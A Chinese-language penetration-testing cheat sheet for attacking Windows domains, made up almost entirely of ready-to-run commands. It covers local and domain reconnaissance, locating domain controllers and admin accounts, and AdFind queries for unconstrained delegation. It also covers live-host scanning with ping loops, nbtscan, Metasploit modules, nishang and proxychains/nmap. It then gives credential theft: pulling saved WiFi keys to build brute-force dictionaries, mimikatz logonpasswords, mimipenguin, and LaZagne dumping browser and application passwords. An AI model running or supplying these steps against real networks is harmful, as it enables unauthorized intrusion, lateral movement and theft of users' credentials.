域内信息收集
一、本机信息收集
ipconfig:查看ip一些网络情况
systeminfo:查看详细信息,补丁信息等
net start:查看启动服务
tasklist:查看进程列表
schtasks:查看计划任务net user:查看本机上的用户
net localgroup:查看本地的用户组
netstat -ano:查看端口开放情况
whoami /all:查看用户权限
查看WIFI密码
比如有机器断网了 需要连一下网络,有人就打开过自己的热点去连接,那么如果这个人是管理员,然后有很多人设置密码的习惯可能都是差不多的,那么可以组组建字典,去爆破一下
Netsh WLAN show profiles:查看电脑连接过的wifi
Netsh WLAN show profile name="WIFI名称" key=clear:其中的“关键内容”对应的就是密码
二、域内信息收集
net user /domain:查看域里面的用户
net group /domain:查看域内组的信息
wmic useraccount get /all:查看域用户的详细信息
net group "Domain Admins" /domain:查看域管理员账户
net group "Enterprise Admins" /domain:查看管理员用户组net localgroup administrators /domain:查看域内管理员组
net group "Domain Controllers" /domain:查看域控
三、判断当前所在域
ipconfig /all:根据是否有“主DNS后缀”,有就是域环境,没有就是工作组
net config workstation:查看计算机名、全名、用户名、系统版本、工作站、域、登陆域
net view /domain:判断存在几个域
判断域控
net time /domain:判断域控,返回主域的时间,配合“nslookup”“ping”确定IP地址
nslookup xxx.com
ping xxx.com
set log:查看客户端登陆到哪台域控制器,找到直接ping计算机名
nltest /dclist:xxx.com : 查找域控,找到直接ping,xxx.com是域
nslookup -type=SRV _ldap._tcp.xxx.com :通过srv记录查找域控,xxx.com是域
四、探针域内存活主机
1、windows自带命令
for /L %i in (1,1,254) do @ping -w 1 -n 1 192.168.1.%i | findstr "TTL=" ping命令探测
2、nbtscan
工具nbtscan下载:http://unixwiz.net/tools/nbtscan.html
nbtscan 192.168.1.0/24
3、msf
kali自带
通过反弹shell到msf上,进行扫描
auxiliary/scanner/discovery/arp_sweep 通过arp扫描
auxiliary/scanner/discovery/udp_sweep 通过udp扫描auxiliary/scanner/smb/smb_version 通过smb 扫描
auxiliary/scanner/snmp/snmp_enum 通过snmp扫描auxiliary/scanner/netbios/nbname 通过netbios扫描
auxiliary/scanner/portscan/syn 通过syn进行端口扫描
auxiliary/scanner/portscan/tcp 通过tcp进行端口扫描
auxiliary/scanner/portscan/ack 通过tcp ack进行端口扫描auxiliary/scanner/portscan/xmas 通过tcp xmas 端口扫描
auxiliary/scanner/portscan/ftpbounce 通过ftp bounce 端口扫描
4、nishang
工具nishang下载:https://github.com/samratashok/nishang
打开powershell
cd .\nishang-master 进入nishang目录
Import-Module .\nishang.psm1 导入模块
Set-ExecutionPolicy RemoteSigned 设置执行策略
Get-Command -Module nishang 获取命令函数
Get-Information 获取计算机信息
Invoke-PortScan -StartAddress 192.168.1.0 -EndAddress 192.168.1.100 -ResolveHost -ScanPort 端口扫描
其他功能:反弹shell,获取凭据等
5、AdFind
工具AdFind下载:https://softpedia.com/get/Programming/Other-Programming-Files/AdFind.exe
AdFind.exe -sc dclist 列出域控制器
AdFind.exe -schema -s base objectversion 查看域控版本
AdFind.exe -sc computers_active 查看所有在线计算机
AdFind.exe -user name 查看当前域内所有用户,用户组
AdFind.exe -default -f "(&(|(&(objectCategory=person)(objectClass=user))(objectCategory=group))(adminCount=1))" -dn 查看域管账户
AdFind.exe -b "DC=xxx,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn 查看指定域内非约束委派主机,xxx为域
AdFind.exe -b "DC=xxx,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName 查询指定域内的非约束委派用户,xxx为域
6、nmap
kali自带
通过socks代理,proxychains+nmap
proxychains nmap 192.168.1.* 查找这个网段的存活主机
proxychains nmap -sS -p- -v192.168.1.10 查这个ip的全端口扫描
五、其他工具的使用
1、mimikatz
工具mimikatz下载:mimikatz:https://github.com/gentilkiwi/mimikatz
适用于windows,需要高权限,需要提权
privilege::debug 获取权限
sekurlsa::logonpasswords 获取账号密码
2、mimipenguin
工具mimipenguin下载:https://github.com/huntergregal/mimipenguin
适用于linux,需要高权限,需要提权,有sh和py两个版本,py的需要安装有python环境
./mimipenguin.sh 直接执行
3、LaZagne
工具LaZagne下载:https://github.com/AlessandroZ/LaZagne
全系统适用,从浏览器、社交软件、数据库等获取账号密码
windows
.\LaZagne.exe browsers 抓取eg浏览器
.\LaZagne.exe browsers -firefox 抓取火狐浏览器
.\LaZagne.exe all 运行所有模块的抓取
.\LaZagne.exe all -oN -output D:\LaZagne\ 将运行后的数据保存到LaZagne这个目录下